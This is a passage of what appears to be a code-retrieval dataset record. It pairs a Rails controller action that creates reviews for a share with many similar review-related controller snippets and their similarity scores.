"def index\n @user_reviews = UserReview.all.order(:rate_period).page(params[:page])\n end",
"def show\n\t@review = Review.joins(:site).includes(:site).find(params[:id])\n end",
"def index\n # this is our list page for our review\n # variable is @.\n # creating a filter variable for price\n @price = params[:price]\n #creating a filter variable for cuisine\n @cuisine = params[:cuisine]\n # adding location filter using geocoder\n @location = params[:location]\n\n #filtering properly by get all the reviews \"Review\" model from the database\n #creating new review variable as ruby list[]\n #@reviews = [\"The Smile\", \"Baby Bo's\", \"Chipotle\", \"nandos\"]\n @reviews = Review.all\n\n # filtering by price. this will toggle on/off depend when it has filter\n if @price.present?\n #take all of the review we have and replace the original review with filtered ones\n # find the value of the price in db that matches the param above\n @reviews = @reviews.where(price: @price)\n end\n\n #filter by cuisine\n if @cuisine.present?\n @reviews = @reviews.where(cuisine: @cuisine)\n end\n #search near the location\n if @location.present?\n # .near is what geo lcation given to us - see docs\n @reviews = @reviews.near(@location)\n end\n\n end",
"def index\n @review_templates = ReviewTemplate.all\n end",
"def show\n @review = @post.reviews.find(params[:id])\n respond_with @post, @review\n end",
"def show\n @user = current_user\n @review = Review.joins(:movie).includes(:movie)\n .find_by_id(params[:id])\n\n @comments = @review.review_comments.map do |comment|\n if @user != nil\n belongs_to_user = @user.id == comment.user_id\n else\n belongs_to_user = false\n end\n {\n id: comment.id,\n body: comment.body,\n author: comment.user.nickname,\n author_image: comment.user.image,\n belongs_to_user: belongs_to_user\n }\n end\n if @user != nil\n @review_likes = ReviewLike.where(\"user_id = ? AND review_id = ?\", @user.id, @review.id)\n if @review_likes.empty?\n review_like_id = 'null'\n review_liked = false\n else\n review_like_id = @review_likes[0].id\n review_liked = true\n end\n else\n review_like_id = 'null'\n review_liked = 'null'\n end\n\n review = {\n title: @review.title,\n id: @review.id,\n likes: @review.likes,\n body: @review.body,\n genre: @review.genre,\n movie: @review.movie,\n belongs_to_user: @review.user == @user,\n review_like_id: review_like_id,\n review_liked: review_liked\n }\n render json: {review: review, comments: @comments}\n end",
"def index\n if current_user.type == \"Student\"\n @reviews = Review.all.search(params[:search])\n \n else\n @reviews = current_user.reviews\n end\n @review = Review.new\n end",
"def index\n @reviews = Review.order(:place_id)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def review\n end",
"def show\n review_score = {usefulness: 0,friendliness: 0,}\n @review_count = 0\n conversations = Conversation.where(stylist_id: @professional_profile.user)\n conversations.each do |conversation|\n reviews = Review.where(conversation_id: conversation)\n if reviews.present?\n reviews.each do |review|\n @review_count += 1\n review_score[:usefulness] += review.usefulness\n review_score[:friendliness] += review.friendliness\n end\n @reviews_present = true\n else\n\n end\n end\n #What should no reviews be\n @userfulness_score = review_score[:usefulness].to_f / @review_count if review_score[:usefulness] != 0\n @friendliness = review_score[:friendliness].to_f / @review_count if review_score[:friendliness] != 0\n end",
"def index\n author = Author.find(params[:author_id])\n @reviews = author.reviews\n render json: @reviews\n end",
"def show\n @reviews = @movie.reviews.page params[:page]\n @reported_reviews = current_user.reported_reviews.where(movie: @movie).pluck(:review_id)\n end",
"def index\n @event_reviews = EventReview.all\n redirect_to \"/events\"\n end",
"def show\n @review = Review.find(params[:id])\n\n end",
"def index\n @add_image_to_reviews = AddImageToReview.all\n end",
"def index\n @reviews = Review.all\n @latest_reviews = Review.latest\n @highest_score_reviews = Review.highest_score\n @lowest_score_reviews = Review.lowest_score\n end",
"def index\n if params[:site].blank?\n\t\t# get all reviews and their corresponding sites and order them descending\n\t\t@reviews = Review.joins(:site).order(created_at: :desc).includes(:site)\n\telse\n\t\t# for filtering by site in review list\n\t\t# get all reviews which belong to site name in parameter, order them descending and also get corresponding site\n\t\t@reviews = Review.joins(:site).where( sites: { name: params[:site] }).order(created_at: :desc).includes(:site)\n\tend\n end",
"def show\n #this is going to be the individual review page using no. in db row using params array of :id. make sure we now create view page\n @review = Review.find(params[:id])\n end",
"def show\n @review = Review.find(params[:id])\n end",
"def show\n @review = Review.find(params[:id])\n end"
] |
[
"0.7431748",
"0.74059606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7202078",
"0.7202078",
"0.7161231",
"0.711936",
"0.7092843",
"0.70846015",
"0.70543146",
"0.7024695",
"0.6999844",
"0.69851214",
"0.69833916",
"0.69560015",
"0.6955459",
"0.6949214",
"0.69076777",
"0.6897412",
"0.6870663",
"0.6865626",
"0.6859445",
"0.6856105",
"0.6850809",
"0.6784931",
"0.6777847",
"0.6763519",
"0.6745613",
"0.6734969",
"0.6724279",
"0.6719189",
"0.6717712",
"0.6717425",
"0.66831225",
"0.66778934",
"0.66677725",
"0.6636018",
"0.66290253",
"0.6626681",
"0.6617004",
"0.6613679",
"0.66021645",
"0.65991443",
"0.65933853",
"0.65668505",
"0.65634364",
"0.6554638",
"0.6554638",
"0.6545174",
"0.6543651",
"0.6480624",
"0.64608485",
"0.64511836",
"0.64478886",
"0.6447751",
"0.64420617",
"0.6442054",
"0.6430952",
"0.6405244",
"0.6404096",
"0.64039975",
"0.6402533",
"0.6398819",
"0.6394077",
"0.63653624",
"0.63571805",
"0.6346248",
"0.634522",
"0.6344518",
"0.6343105",
"0.6337448",
"0.6335547",
"0.63201207",
"0.63195664",
"0.63168174",
"0.63110757",
"0.63098454",
"0.630282",
"0.62988496",
"0.62926656",
"0.6263686",
"0.6256343",
"0.62516207",
"0.6251233",
"0.624192",
"0.6241366",
"0.6240407",
"0.6235066",
"0.6235066"
] |
0.74671495
|
0
|
This method handles creating a new review for a share
|
def create
  # Reload the ordered list so the index view can be re-rendered on failure
  @reviews = @share.reviews.order(priority: :asc)
  # Build the new review from the whitelisted form parameters
  @reviewToAlter = @share.reviews.new(review_params)
  if @reviewToAlter.save
    redirect_to share_reviews_path(@share), notice: "Review saved!"
  else
    flash[:alert] = "Error : #{@reviewToAlter.errors.full_messages.to_sentence}"
    render :index
  end
end
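create builds the review from review_params, a strong-parameters helper that is not shown in this record. A minimal sketch, assuming the form submits content and priority fields (both attribute names are assumptions, not taken from the original controller):

private

# Hypothetical strong-parameters whitelist; adjust the permitted
# attribute names to match the actual Review columns.
def review_params
  params.require(:review).permit(:content, :priority)
end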
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n @review = Review.new(review_params)\n if @review.save\n redirect_to reviews_path\n else\n render 'new'\n end\n end",
"def create\n review = course.reviews.new(review_params)\n \n if review.save\n render json: ReviewSerializer.new(review).serialized_json\n else\n render json: { error: review.errors.messages }, status: 422\n end\n end",
"def create\n @review = Review.new(review_params)\n current_user.reviews << @review\n respond_to do |format|\n if @review.save\n format.json { render :show, status: :created, location: @review }\n else\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # Creates a new review & sends them back to their updated page\n review = current_user.reviews.create(review_params)\n if review.save\n redirect_to :back\n else\n redirect_to product_path(id: params[:product_id])\n end\n end",
"def create\n\t\t\t\t@review = DriverReview.new(create_driver_review_params)\n\t\t\t\t@review.driver_id = @request.driver_id\n\t\t\t\t# render_invalid_action(@review) unless @review.save\n\t\t\t\t@review.save!\n\t\t\t\tlogger.debug @review.errors.messages\t\t\t\t\n\t\t\tend",
"def create\n @review = reviewable.reviews.build(params[:review])\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to reviewable_review_url(reviewable, @review), notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = current_author.reviews.create(review_params)\n render json: @review, status: 201\n end",
"def create\n @review = Review.new(review_params)\n @review.exceptional ||= 0\n if @review.save\n @apn.update_attribute(:reviewed, true)\n link = reviews_path\n name = @apn.profile.first_name.capitalize + \" \".to_s + @apn.profile.last_name.capitalize\n redirect_to new_review_path, notice: (\"#{name} successfully reviewed.\" +\n \" New application loaded. If you're feeling lazy, <a href='#{link}'>\" +\n \"go to the Dashboard</a>\").html_safe\n else\n render action: \"new\", alert: \"something went wrong with submitting the review\"\n end\n end",
"def create\n if current_user\n @review = current_user.reviews.build(params[:review])\n\n respond_to do |format|\n if @review.save\n flash[:success] = 'Запись успешно добавлена!'\n format.html { redirect_to reviews_path }\n format.json { render json: @review, status: :created, location: reviews_path }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n else\n flash[:error] = 'Вы должны войти в систему!'\n redirect_to root_path\n end\n end",
"def create\n\t\t@review = Review.new(review_params)\n\t\t@review.user_id = current_user.id\n\t\trespond_to do |format|\n\t\t\tif @review.save\n\t\t\t\t@reviews = Review.order(:heading).paginate(page: params[:page], per_page: 18)\n\t\t\t\tformat.html { redirect_to @review; flash[:success]= 'review was successfully created.' }\n\t\t\t\tformat.json { render :show, status: :created, location: @review }\n\t\t\t\tformat.js\n\t\t\telse\n\t\t\t\tformat.html { render :new }\n\t\t\t\tformat.json { render json: @review.errors, status: :unprocessable_entity }\n\t\t\t\tformat.js\n\t\t\tend\n\t\tend\n\tend",
"def create\n @review = current_user.reviews.build(review_params)\n \n if @review.save\n flash[:success] = 'レビューを投稿しました。'\n redirect_to root_url\n else\n @reviews = current_user.reviews.order(id: :desc).page(params[:page])\n flash.now[:danger] = 'レビューの投稿に失敗しました。'\n render '/reviews'\n end\n end",
"def create\n @product = Product.find params[:product_id] \n @review = @product.reviews.create(review_params)\n if @review.save\n redirect_to :back\n end\n end",
"def create\n item = Item.find(params[:review][:rateable_id])\n @review = item.reviews.new\n @review.user_id = current_user.id\n @review.rating = params[:review][:rating]\n @review.comment = params[:review][:comment]\n if @review.save\n redirect_to item_path(item)\n else\n flash[:alet] = \"There was a problem creating the review\"\n render :new\n end\n end",
"def create\n\t\t@review = Review.new(review_params)\n\t\t# ensure that there is a description\n\t\tif @review.description.blank?\n\t\t\tflash[:error] = 'Your review must have a description!'\n\t\t\tredirect_to new_review_path\n\t\telse\n\t\t\t# continue with rest of saving\n\t\t\t@review.user = current_user #.id?\n\t\t\tif @review.save\n\t\t\t\tredirect_to trip_path(id: @review.trip.id)\n\t\t\telse\n\t\t\t\tflash[:error] = @review.errors.full_messages.to_sentence\n\t\t\t\tredirect_to new_review_path\n\t\t\tend\n\t\tend\n\tend",
"def create\r\n _params = review_init_params\r\n _params[:id] = SecurityManager.md5(\"#{@user.id}_#{@task.id}\")\r\n _params[:score] = _params[:score].to_i\r\n _params[:author_id] = @user.id\r\n\r\n begin\r\n @review = @task.reviews.create(_params)\r\n rescue Mongo::Error::OperationFailure\r\n return bad_request(\"duplicated\")\r\n end\r\n\r\n respond_to do |format|\r\n if @review.save\r\n format.html { redirect_to '/task' }\r\n else\r\n return unprocessable_entity\r\n end\r\n end\r\n end",
"def create \n @refrigerator = Refrigerator.find(params[:refrigerator_id])\n @review = Review.create(create_update_params)\n @refrigerator.reviews << @review\n\n if @review.save!\n\n flash[:notice] = 'Review successfully created.'\n redirect_to refrigerator_path(params[:refrigerator_id])\n else\n flash[:notice] = 'Could not create new review.'\n redirect_to (new_refrigerator_review_path(@refrigerator))\n end\n end",
"def create\n @review = @story.reviews.new(review_params)\n if @review.save\n redirect_to @review.story, notice: 'Review was successfully created.'\n else\n render :new\n end\n end",
"def create\n @review = @post.reviews.where(user_id: current_user.id).create(params[:review])\n respond_with @post, @review, location: post_path(@post, anchor: \"review_#{@review.id}\")\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if !!@review && current_user\n current_user.reviews << @review\n @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\t\t@review = Review.new(params[:review])\n\t\t@review.establishment = Establishment.find(params[:establishment])\n\t\t@review.category = Category.find(params[:category])\n\t\t@review.clientele = Clientele.find(params[:clientele])\n\t\t@review.sound_level = SoundLevel.find(params[:sound_level])\n\t\t@review.hygiene = Hygiene.find(params[:hygiene])\n\t\t@review.rating = Rating.find(params[:rating])\n\n\t\trespond_to do |format|\n\t\t\tif @review.save\n\t\t\t\tformat.html { redirect_to(@review, :notice => 'Review was successfully created.') }\n\t\t\t\tformat.xml { render :xml => @review, :status => :created, :location => @review }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"new\" }\n\t\t\t\tformat.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: \"レビューが作成されました\" }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #binding.pry\n review = Review.new(review_params) \n if review.save\n render json: ReviewSerializer.new(review)\n else\n render json: {errors: review.errors.full_messages}\n end\n end",
"def create\n # any registered user can add a review\n unless current_user.is_general_user?\n redirect_to denied_path\n return\n end\n\n @review = Review.new(params[:review])\n @review.user_id = current_user.id\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to(@review, :notice => 'Review was successfully created.') }\n format.xml { render :xml => @review, :status => :created, :location => @review }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(params[:review])\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n respond_to do |format|\n if Review.validate(@review) and @review.save\n format.html { redirect_to bookings_path, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n flash[:notice] = \"You are submitting your review multiple times. Aborting\"\n format.html { redirect_to bookings_path }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render action: 'show', status: :created, location: @review }\n else\n format.html { render action: 'new' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n if @review.save\n render json: @review, status: :created, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def create\n @review = Review.new(review_params)\n\n if @review.save\n render json: @review, status: :created, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def create\n @review = Review.new(review_params)\n\n if @review.save\n render json: @review, status: :created, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def create\n review_params[:rating].sub!(/\\s*[^0-9]*\\z/, '') if review_params[:rating].present?\n\n @review = Spree::Review.new(review_params)\n @review.product = @product\n @review.user = spree_current_user if spree_user_signed_in?\n @review.ip_address = request.remote_ip\n @review.locale = I18n.locale.to_s if Spree::Reviews::Config[:track_locale]\n # Handle images\n params[:review][:images]&.each do |image|\n @review.images.new(attachment: image) if image.present?\n end\n\n authorize! :create, @review\n if @review.save\n flash[:notice] = I18n.t('spree.review_successfully_submitted')\n redirect_to spree.product_path(@product)\n else\n render :new\n end\n end",
"def create \n @review = Review.new\n @review.rateable_type = params[:review][:rateable_type]\n @review.rateable_id = params[:review][:rateable_id]\n @review.user_id = current_user.id \n @review.rating = params[:review][:rating]\n @review.comment = params[:review][:comment]\n if @review.save\n redirect_to course_path(@review.rateable_id)\n else \n flash[:alert] = \"Opps, something went wrong when creating your review\"\n redirect_to courses_path\n end \n end",
"def create\n current_user = User.find(session_params)\n @review = Review.new(\n user_id: current_user.id,\n product_id: params[:product_id],\n rating: params[:rating],\n description: params[:review][:description]\n )\n if @review.valid?\n @review.save\n redirect_to product_path(params[:product_id])\n else\n redirect_to root_path\n end\n end",
"def create\n @post = Post.new(post_params)\n @post.user_id=current_user.id\n create_review(@post)\n end",
"def create\n @review = Review.new(params[:review])\n if @review.save\n flash[:notice] = \"Review Created\"\n redirect_to \"/products\"\n else\n render \"create\"\n end\n end",
"def create\n @user = current_user\n @review = @user.reviews.build(review_params)\n if @user.save\n render json: @review\n end\n end",
"def new\n\t\tif !authenticate_user!(\"You must be logged in to write a review. Login now or sign up!\", true) \n\t\t\treturn \n\t\tend\t\t\n\t\t@store_review = @store.store_reviews.build\t\t\n\t\trender layout: false\t\t\n\tend",
"def create\n\t\t@book_review = BookReview.new(params[:book_review])\n\t\t@book_review.user_id = current_user.id\n\t\t@book_review.book_id = params[:book_id]\n\n\t\trespond_to do |format|\n\t\t\tif @book_review.save\n\t\t\t\tformat.html { redirect_to @book_review, :notice => 'Book review was successfully created.' }\n\t\t\t\tformat.json { render :json => @book_review, :status => :created, :location => @book_review }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"new\" }\n\t\t\t\tformat.json { render :json => @book_review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n params[:review][:rating].sub!(/\\s*[^0-9]*\\z/, '') unless params[:review][:rating].blank?\n\n @review = Designerreview.new(review_params)\n @review.designer = @designer\n @review.user = spree_current_user if spree_user_signed_in?\n @review.ip_address = request.remote_ip\n @review.locale = I18n.locale.to_s if Designerreviews::Config[:track_locale]\n\n authorize! :create, @review\n if @review.save\n flash[:notice] = Spree.t(:review_successfully_submitted)\n redirect_to designer_path(@designer)\n else\n render :new\n end\n end",
"def save_review\r\n return unless self.review\r\n begin\r\n r = JSON.parse self.review\r\n c = Comment.new\r\n c.id = r['id']\r\n c.content = r['content']\r\n c.user_id = r['user']['id']\r\n c.app_id = r['app']['id']\r\n c.created_at = Time.at r['created_at']\r\n c.model = r['model']\r\n c.sdk = r['sdk']\r\n c.image = r['image']\r\n c.image_size = r['image_size']\r\n c.sns_status_id = r['sns_status_id']\r\n c.sns_id = r['sns_id'] \r\n c.in_reply_to_id = r['in_reply_to_id']\r\n c.save\r\n rescue\r\n end\r\n end",
"def create\n @review = current_user.reviews.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to place_path(@review.place), notice: 'Review was successfully created.' }\n else\n format.html { redirect_to root_path }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user = current_user\n\n if @review.save\n render :show, status: :created, location: @review\n else\n render json: { Error: @review.errors }, status: :unprocessable_entity\n end\n end",
"def create\n @review = Review.new(params[:review])\n\n if @review.save\n redirect_to contact_path, :notice => \"Uw waardering is geplaatst, hartelijk dank!\"\n else\n\t\t\tredirect_to contact_path, :notice => \"Uw waardering kan op dit moment niet geplaatst worden, probeer het later nog eens.\"\n end\n end",
"def create\n @venue_review = @venue.venue_reviews.new(params[:venue_review])\n @venue_review.added_by = current_user.id\n respond_to do |format|\n if @venue.venue_reviews << @venue_review\n flash[:notice] = 'Thank you for your valuable review.'\n format.html { redirect_to(venue_path(@venue)) }\n format.xml { render :xml => @venue_review, :status => :created, :location => @venue_review }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @venue_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @shop = Shop.find(params[:shop_id])\n @review = @shop.reviews.create(reviewer: params[:review][:reviewer], rate: params[:review][:rate], body: params[:review][:body])\n\n if @review.save\n puts \"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\"\n flash[:notice] = \"レビューの投稿が完了しました\"\n redirect_to shop_path(@shop)\n\n else\n redirect_to shop_path(@shop)\n flash[:notice] = \"レビューの投稿に失敗しました\"\n end\n\n\n end",
"def require_new_review\n\t\t@review = @profile.reviews.build\n\tend",
"def create\n \n @venue = Venue.find(params[:venue_id])\n #@venue = Venue.find_by_venue_id(params[:venue_id])\n @review = @venue.reviews.create(params[:review])\n #redirect_to venue_show_path(params[@venue.venue_id])\n @review.venue_id = params[:venue_id]\n #@review = @restroom.reviews.build(params[:review])\n #@review.save\n @review.user = current_user\n @review.venue = Venue.find(params[:venue_id])\n \n respond_to do |format|\n if @review.save\n format.html { redirect_to venue_show_path(params[@venue.id], :venue_id => @venue.venue_id ), :notice => 'Your review was successfully posted.'}\n format.xml { render :xml => @venue, :status => :created, :location => @venue }\n else\n format.html { redirect_to(@venue, :notice => \n 'Review could not be saved. Please fill in all fields')}\n format.xml { render :xml => @venue.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n @product = Product.find(@review.product_id)\n if @review.save\n flash[:success] = \"Review created!\"\n redirect_to @product\n else\n @reviews = @product.reviews.paginate(page: params[:page])\n render template: \"products/show\"\n end\n end",
"def new\n\t\t@review = Review.new\n\tend",
"def create\n @review = Presentation.find(params[:id]).reviews.build(reviews_params)\n @review.user_id = current_user.id\n @review.save\n redirect_to current_user\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n @review.movie_id = @movie.id\n\n respond_to do |format|\n #If the review is saved, it redirects to the movie page and shows the notice.\n if @review.save\n format.html { redirect_to @movie, notice: t('review.create') }\n format.json { render :show, status: :created, location: @review }\n #If the review is not saved, it refreshes the create review page.\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @product = Product.find(params[:product_id])\n\n @review = @product.reviews.new(review_params)\n\n @review.user = current_user\n\n if @review.save\n redirect_to @product, notice: 'Review was created successfully.'\n else\n redirect_to @product, notice: 'Review failed to save.'\n end\n end",
"def create\n\n @product = Product.find( params[:product_id])\n @product.reviews.create(review_params)\n @product.save\n\n if current_user.try(:admin?)\n redirect_to product_path(@product)\n else\n redirect_to store_show_path(@product)\n end\n\n @review = Review.new(review_params)\n\n end",
"def create\n\t\t# Review properties filled using user inputs from view\n\t\t@review = Review.create(review_params)\n\t\t# Linking review to car\n\t\t@review.car_id = @car.id\n\t\t# Linking review to user \n\t\t@review.user_id = current_user.id\n\t\t# Attempts to save review\n\t\tif @review.save\n\t\t\t# Once saved, redirected to show page of car, review should be visible\n\t\t\tredirect_to car_path(@car)\n\t\telse\n\t\t\t# If not saved, go to new review page again\n\t\t\trender 'new'\n\t\tend\n\tend",
"def create\n @reviews_and_rating = ReviewsAndRating.new(reviews_and_rating_params)\n\n respond_to do |format|\n if @reviews_and_rating.save\n format.html { redirect_to @reviews_and_rating, notice: 'Reviews and rating was successfully created.' }\n format.json { render :show, status: :created, location: @reviews_and_rating }\n else\n format.html { render :new }\n format.json { render json: @reviews_and_rating.errors, status: :unprocessable_entity }\n end\n end\n end",
"def review\n render_create @order.build_review review_params\n rescue ActiveRecord::RecordNotSaved\n render_error I18n.t('review_exist'), :unprocessable_entity\n end",
"def create\n @video = Video.find(params[:id])\n @review = Review.new(review_params.merge!(creator: current_user, video: @video))\n\n if @review.save\n flash[:success] = \"You have posted the review\"\n redirect_to video_path\n else\n @reviews = @video.reviews\n flash.now[:danger] = \"There was a problem with your submission\"\n render 'videos/show'\n end\n end",
"def create\n @review = @place.reviews.new(params[:review])\n @review.user = current_user\n respond_to do |format|\n if @review.save\n format.html { redirect_to place_path(@place), notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { redirect_to place_path(@place, :anchor => \"review\"), notice: 'Please enter your review!!.' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to dashboard_path, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(params[:review])\n @review.review_date = Time.now\n @review.user_id = current_user.id\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to place_url(@review.place), notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @idea = Idea.find params[:idea_id]\n review_params = params.require(:review).permit(:body)\n @review = Review.new review_params\n @review.idea = @idea\n @review.user = current_user\n\n if @review.save\n redirect_to idea_path(@idea), notice: \"Review created!\"\n else\n flash[:alert] = 'Problem creating review'\n render 'ideas/show'\n end\n end",
"def create_review(booking, options = {})\n post(\"bookings/#{booking}/reviews\", reviews: [options]).pop\n end",
"def add_review(restaurant, content)\n new_review = Review.new(restaurant, content)\n new_review.customer = self\n new_review.restaurant = restaurant\n end",
"def create\n @review = Review.new(review_params)\n\t@review.user_id = current_user.id\n\t\n\t# used for partials rendering in SPA\n\t@site = Site.find(@review.site_id)\n\t@sites = Site.all\n\t@reviews = Review.where(site_id: @site.id).order(\"created_at DESC\")\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n\t\tformat.js\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n\t\tformat.js { render 'shared/errors' }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n \n #유저는 한 식당에 한번의 리뷰만 쓸 수 있다.\n # if current_user.reviews.restaurant_id?\n # redirect_to @review.errors,flash:{note: '리뷰는 한번만.'}\n # else\n # @review.save\n # redirect_to @review,flash:{success: 'Review was successfully created.'}\n # end\n \n if @review.save\n # redirect_to @review, flash:{success: 'Review was successfully created.'}\n redirect_to restaurant_url(@review.restaurant_id), flash:{success: 'Review was successfully created.'}\n else\n render :new\n end\n \n \n end",
"def create\n pr = params[:review]\n review = Review.new\n \n if review.cadastrar(current_user, pr[:project_id], pr[:tipo], pr[:texto])\n redirect_to project_path(review.project_id), :notice => 'Revisao Cadastrada Com Sucesso.'\n else\n flash[:error] = \"Revisao Nao Cadastrada #{review.errors.messages}.\"\n redirect_to project_path(review.project_id)\n end\n end",
"def post_review\n @review = Review.new\n @review.title = params[:title]\n @review.description = params[:description]\n @review.name = params[:name]\n @review.user_id = User.find(session[:user_id]).id\n @review.rating = params[:rating]\n @review.listing = params[:listing]\n @review.save()\n # flash[:notice] = \"Review added successfully.\"\n redirect_to :action => :listing, :id => params[:listing]\n end",
"def create\n @review = @publication.reviews.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review.publication, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_review(restaurant, content)\n Review.new(self, restaurant, content)\n end",
"def create\n @review = Review.new(review_params)\n\n if !params[:course_id].blank? && !params[:professor_id].blank?\n @review.course_id = params[:course_id]\n @review.professor_id = params[:professor_id]\n @review.authuser_id = current_user.id\n respond_to do |format|\n if @review.save\n format.html do\n redirect_to professor_course_path(\n @review.professor_id,\n @review.course_id\n ),\n notice: 'Your review was submitted'\n end\n format.json { render :show, status: :created, location: @review }\n else\n @professors = load_professors\n @courses = load_courses\n format.html { render :new }\n format.json do\n render json: @review.errors, status: :unprocessable_entity\n end\n end\n end\n else\n redirect_to new_review_path, notice: 'Fill out all required fields'\n end\n end",
"def create\n @review = Review.new(params[:review])\n @review.user = current_user\n\n respond_to do |format|\n if @review.save\n flash[:notice] = 'Review was successfully created.'\n format.html { redirect_to(@review) }\n format.xml { render :xml => @review, :status => :created, :location => @review }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @listing = List.find(params[:list_id])\n #@user = current_user\n @review = current_user.reviews.build(params[:review])\n @review.list_id = @listing.id\n #@review = @listing.reviews.build(params[:review])\n #@review.update_attributes(:user_id => @user)\n \n respond_to do |format|\n if (@review.save)\n format.html { redirect_to(@listing) } #, :notice => 'Your review was successfully added.') }\n format.xml { render :xml => @listing, :status => :created, :location => @listing }\n #format.html { redirect_to(@listing, :notice => 'Review was successfully created.') }\n #format.xml { render :xml => @listing, :status => :created, :location => @listing }\n #redirect_to @listing\n else \n format.html { redirect_to(@listing) } #, :notice => 'Your review was not added.') }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n #flash[:error] = \"The review could not be created because there were some errors..........\"\n #redirect_to @listing\n end\n end\n end",
